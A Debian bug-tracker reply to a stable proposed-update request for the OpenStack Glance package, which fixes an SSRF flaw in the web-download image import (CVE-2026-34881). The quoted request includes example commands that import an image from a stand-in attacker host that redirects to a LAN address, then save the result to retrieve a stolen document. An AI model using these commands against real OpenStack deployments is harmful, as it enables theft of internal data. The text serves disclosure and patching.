Control: clone -1 -2 Control: retitle -1 trixie-pu: package glance/2:30.0.0-3+deb13u1 Control: retitle -2 bookworm-pu: package glance/2:25.1.0-2+deb12u2
Hi Thomas, On Sun, Apr 05, 2026 at 05:10:51PM +0200, Thomas Goirand wrote: > Package: release.debian.org > Severity: normal > Tags: trixie > X-Debbugs-Cc: [email protected] > Control: affects -1 + src:glance > User: [email protected] > Usertags: pu > > Hi, > > I would like to close this bug through p-u: > https://bugs.debian.org/1131274 > > [ Reason ] > This fixes CVE-2026-34881 / OSSA-2026-004. > > [ Impact ] > Before the fix, someone can trick Glance to attempt a web-download > from a server that will do a redirect to a LAN IP address. For example, > something like this: > > openstack image import --method web-download --uri \ > https://hacker-server.example.com/malicious-redirect \ > my-image > > may redirect to an IP in the LAN of the OpenStack deployment. As a > result, the content of the document on the LAN will be saved as a > glance image, and can be retrived through: > > openstack image save --file stolen-document.txt my-image > > The proposed fix checks if the web-download URL has a redirect > and denies the operation if that is the case. > > [ Tests ] > The proposed patch includes new tests, and this has been tested > in upstream functional CI too. > > [ Risks ] > We've put this patch in production, and it worked well for us. > I haven't tested specifically this version of Glance, but I > believe it should be fine, thanks to unit tests. > > [ Checklist ] > [x] *all* changes are documented in the d/changelog > [x] I reviewed all changes and I approve them > [x] attach debdiff against the package in (old)stable > [x] the issue is verified as fixed in unstable > > I've attached debdiff for both Trixie and Bookworm. Please > allow me to upload to both p-u. > > Note: I attempted a backport to Bullseye and failed, as the > code changed too much. Maybe someone from the LTS team wants > to take-over this work, but I'm giving up. As a mitigation, > it's possible to use a web proxy for Glance that wouldn't > give access to the LAN. You cover here AFAICS both proposed updates or bookworm and trixie, but please make two individual bugs, one for trixie-pu and one for bookworm-pu. I'm cloning this bug, hopefully getting metadata right. Can you please as well include the CVE identifier in the proposed changelog? Regards, Salvatore
